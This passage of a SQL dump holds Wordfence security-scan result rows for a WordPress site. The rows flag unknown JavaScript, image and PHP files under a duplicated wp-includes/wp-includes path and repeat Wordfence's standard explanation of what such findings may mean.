href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:69:\"wp-includes/wp-includes/js/tinymce/skins/wordpress/images/gallery.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77863,1675048855,1675048855,'new','knownfile',75,'19a1a612c34254dab3459aca6a69335b','ca7408fb0737a86533cf1b5c9978af74','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/skins/wordpress/images/more-2x.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:69:\"wp-includes/wp-includes/js/tinymce/skins/wordpress/images/more-2x.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77864,1675048855,1675048855,'new','knownfile',75,'5aa36a57708fe60b29042a9b0e1e6077','b4a9cd6e7a31f3b959a89c7be230d0b7','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/skins/wordpress/images/more.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:66:\"wp-includes/wp-includes/js/tinymce/skins/wordpress/images/more.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77865,1675048855,1675048855,'new','knownfile',75,'a50dd5555268f032b65e29e1911cfc16','54a5db7879f6ab9317949c69c1963be3','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/skins/wordpress/images/pagebreak-2x.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:74:\"wp-includes/wp-includes/js/tinymce/skins/wordpress/images/pagebreak-2x.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77866,1675048855,1675048855,'new','knownfile',75,'14a94b63c90a019ac1a28c9b1d89b8a8','b0d4707fee34b780201efee2cd54b331','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/skins/wordpress/images/pagebreak.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:71:\"wp-includes/wp-includes/js/tinymce/skins/wordpress/images/pagebreak.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77867,1675048855,1675048855,'new','knownfile',75,'2e693c01fc606a57b574cfef4c5e336c','e926d248fbe094c3448603a39de69c63','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/skins/wordpress/images/playlist-audio.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:76:\"wp-includes/wp-includes/js/tinymce/skins/wordpress/images/playlist-audio.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77868,1675048855,1675048855,'new','knownfile',75,'bd911d04b378b11165107d66cedd358a','9b1ae4bd68e469a1bec1788d080a1144','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/skins/wordpress/images/playlist-video.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:76:\"wp-includes/wp-includes/js/tinymce/skins/wordpress/images/playlist-video.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77869,1675048855,1675048855,'new','knownfile',75,'602a2e777c86614ad7d1804e5311735b','70aa99035bca058b8b56fb6f4986a047','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/skins/wordpress/images/video.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:67:\"wp-includes/wp-includes/js/tinymce/skins/wordpress/images/video.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77870,1675048855,1675048855,'new','knownfile',75,'fddd2ff254e445a39272774f6284910e','4d415996f4de1c4976d2ffe5525dd63c','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/skins/wordpress/wp-content.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/js/tinymce/skins/wordpress/wp-content.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77871,1675048855,1675048855,'new','knownfile',75,'5e76c631d9ca2e9f70da71f926be533c','0ff33da5b042c49b7042dbd28f320ddb','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/themes/inlite/theme.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/js/tinymce/themes/inlite/theme.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77872,1675048855,1675048855,'new','knownfile',75,'96dd77aa91d3ec8eef53bcff9f531d6c','874530172640dd8d8bf9d96795ecfc8e','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/themes/inlite/theme.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/js/tinymce/themes/inlite/theme.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77873,1675048856,1675048856,'new','knownfile',75,'7b375ad95c4e9a2dea0d6c6e19217054','29ce188522227daaad72b18386d26a82','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/themes/modern/theme.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/js/tinymce/themes/modern/theme.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77874,1675048856,1675048856,'new','knownfile',75,'093b567c10c24ff8d12b652502f2537b','adfe735b079187c1db4a9ab204047b09','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/themes/modern/theme.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/js/tinymce/themes/modern/theme.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77875,1675048856,1675048856,'new','knownfile',75,'9bd457fe6088fbd9a6605e1ae5a5e677','59ff6bedcaf3e28f5f233446a9b91f09','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/tiny_mce_popup.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/js/tinymce/tiny_mce_popup.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77876,1675048856,1675048856,'new','knownfile',75,'d26a463dddb4bbe86096b63af42f9b54','3ad350473c931f1735b21f2d4b670a8a','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/tinymce.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/js/tinymce/tinymce.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77877,1675048856,1675048856,'new','knownfile',75,'f09e5cb700cfdca6c09241325e27388e','ebdb5a8612e3aaad5f7ff00e77f3bd8c','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/utils/editable_selects.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/js/tinymce/utils/editable_selects.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77878,1675048856,1675048856,'new','knownfile',75,'b4c070464cf53c5018a761a3a61a24af','e06d6068051859f8bb86b900d4883958','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/utils/form_utils.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/js/tinymce/utils/form_utils.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77879,1675048856,1675048856,'new','knownfile',75,'4d6ce3aef5c23a1c51bf9040f8a2713d','8b5f4faf57ee16a3b25ef54912f5ad7e','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/utils/mctabs.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/js/tinymce/utils/mctabs.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77880,1675048856,1675048856,'new','knownfile',75,'e8555de7788ffc9f14462512b6be37d2','88866b23777b473dab1ec5de562c4703','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/utils/validate.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/js/tinymce/utils/validate.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77881,1675048856,1675048856,'new','knownfile',75,'8f80496551912ddd155f84bb2cdce8a1','bfe53fe574ea27f24f9df5b095c89415','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/wp-tinymce.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/tinymce/wp-tinymce.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77882,1675048856,1675048856,'new','knownfile',75,'9a34613e1aec91b9f5de079fa2d4349e','6d37586ec34b928f634add5c5870b3aa','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/wp-tinymce.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/js/tinymce/wp-tinymce.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77883,1675048856,1675048856,'new','knownfile',25,'c11dfc9958445858443c19f8243cf193','e3a13e1b7256d6aa1b3888dc279cbcf8','Old WordPress core file not removed during update: wp-includes/wp-includes/js/tw-sack.js','This file is in a WordPress core location but is from an older version of WordPress and not used with your current version. Hosting or permissions issues can cause these files to get left behind when WordPress is updated and they should be removed if possible.','a:5:{s:4:\"file\";s:37:\"wp-includes/wp-includes/js/tw-sack.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77884,1675048856,1675048856,'new','knownfile',75,'24b222302fde5f0423b7b4db6e5ea982','0cbea8616235a0117dda3db77ff899d5','Unknown file in WordPress core: wp-includes/wp-includes/js/tw-sack.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/js/tw-sack.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77885,1675048856,1675048856,'new','knownfile',75,'a142f1f23d915351dba914104310f106','b770df839931f3b67d7f0b3971ab9ae2','Unknown file in WordPress core: wp-includes/wp-includes/js/twemoji.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:37:\"wp-includes/wp-includes/js/twemoji.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77886,1675048856,1675048856,'new','knownfile',75,'703db5caf6e6ca83bf36d9b6a6e02b34','feff70237cc844074685c528926e259b','Unknown file in WordPress core: wp-includes/wp-includes/js/twemoji.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/js/twemoji.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77887,1675048856,1675048856,'new','knownfile',75,'15a4892f18553b89df26e2d902c83a4c','c7ed50dbe16a781b87b3ac07707ff131','Unknown file in WordPress core: wp-includes/wp-includes/js/underscore.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:40:\"wp-includes/wp-includes/js/underscore.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77888,1675048856,1675048856,'new','knownfile',75,'5fc1a0b9cbab9ddc88289ce5940bc10a','e1ad69b26fde01d37545166920d44dc7','Unknown file in WordPress core: wp-includes/wp-includes/js/underscore.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/js/underscore.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77889,1675048856,1675048856,'new','knownfile',75,'733efb2cf33d09850d9fbc447c41a5d8','e3dab25780acbbb83d864a6ac6173170','Unknown file in WordPress core: wp-includes/wp-includes/js/utils.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:35:\"wp-includes/wp-includes/js/utils.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77890,1675048857,1675048857,'new','knownfile',75,'c0df717d6f4db47628921fa6b8021856','b5173d5e013c1a63a6e763627709f124','Unknown file in WordPress core: wp-includes/wp-includes/js/utils.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:39:\"wp-includes/wp-includes/js/utils.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77891,1675048857,1675048857,'new','knownfile',75,'4de4ecd80563ddf57f6a3149d5f492b2','4446368b0338549bfe6d6feea10a3940','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-ajax-response.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/wp-ajax-response.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77892,1675048857,1675048857,'new','knownfile',75,'d0c38d8b0d4c34958e5c2b32514f3a7f','0fe887c80e94d328c165b9a62c825dbb','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-ajax-response.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/js/wp-ajax-response.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77893,1675048857,1675048857,'new','knownfile',75,'dbf3474c65f0d84bc1623525651ffa3d','c9a5cd1c1869fa2309e41ed206e09734','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-api.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:36:\"wp-includes/wp-includes/js/wp-api.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77894,1675048857,1675048857,'new','knownfile',75,'544461b4e87e251d2271989834abd8bb','086b7a9df32dc56b3c93ef31a48855dd','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-api.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:40:\"wp-includes/wp-includes/js/wp-api.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77895,1675048857,1675048857,'new','knownfile',75,'101ff5af1e4cbe1d84ce8b590bb799fb','837ab9a2205dcf6a347a465daf6c48d5','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-auth-check.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/js/wp-auth-check.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77896,1675048857,1675048857,'new','knownfile',75,'07d9deceb9afc49e7439aae14b780ae7','e307f6f70e63f765792d0d14cd3c9760','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-auth-check.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/js/wp-auth-check.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77897,1675048857,1675048857,'new','knownfile',75,'cc59041e50093744299924d64c761cc4','bdde3d2cfdd894f8d64060efea6f6159','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-backbone.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/js/wp-backbone.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77898,1675048857,1675048857,'new','knownfile',75,'6ceb203597ef1fad1555b521387fed6f','43455a6729d6a9a121cc55f86a431038','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-backbone.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/js/wp-backbone.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77899,1675048857,1675048857,'new','knownfile',75,'a2a45574316f7e9a7963e1d97db9672a','bbe308fd432f07b4b397b3dce1c3e8de','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-custom-header.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new 